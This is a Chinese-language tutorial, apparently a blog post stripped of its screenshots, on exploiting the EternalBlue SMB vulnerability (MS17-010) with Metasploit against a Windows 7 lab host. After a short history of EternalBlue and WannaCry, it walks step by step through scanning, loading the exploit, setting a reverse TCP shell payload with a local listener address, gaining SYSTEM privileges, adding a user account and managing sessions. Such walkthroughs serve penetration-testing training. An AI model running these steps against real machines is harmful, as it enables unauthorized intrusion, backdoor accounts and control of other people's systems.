1.什么是永恒之蓝?
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
2.通过msf模块获取win7主机远程shell
模块的整体使用流程如下
编辑
1.我们先扫描目标是否存在ms17-010漏洞
编辑
2.加载对应的模块
编辑
3.查看需要设置的参数
show options
编辑
4.设置目标主机
编辑
5.开始扫描,run运行
如图,我们可以确定目标是脆弱的,系统里有ms17-010漏洞。编辑
6.查找攻击模块
编辑
7.加载攻击模块
编辑
8.查看需要设置的参数
编辑
9.设置目标主机
编辑
10.查看该攻击载荷使用的系统类型show targets
如图,可以看出永恒之蓝可以针对win7和server 2008操作系统。
编辑
11.查看该模块可以使用的攻击载荷 show payloads
编辑
12.选择攻击模块 show windows/x64/shell编辑
13.设置攻击载荷 set payload windows/x64/shell/reverse_tcp
编辑
14.设置本地主机 set LHOST 192.168.0.109
15.查看设置参数
编辑
16.run运行
如图,渗透成功。
编辑
17.执行一些命令去测试一下
添加一个账号
编辑
在win7系统里查看用户。如图,添加成功。
编辑
但是,我们在终端模拟器里看到一些乱码。
编辑
原因是:一个是linux系统,一个是windows系统,编码方式不一样。
解决办法:chcp 65001
编辑
编辑
查看我们的权限。
如图,可以看到我们是系统最高权限及root权限。
编辑
终端会话:ctrl+c
编辑
拿到会话后,我们将其保存到后台 exploit -j
编辑
此时,会话保存到后台了。我们输入sessions,进行查看。
编辑
记录会话 sessions -i 4
编辑
退出但不断开这个链接 background
编辑
删除会话 sessions -k 4
编辑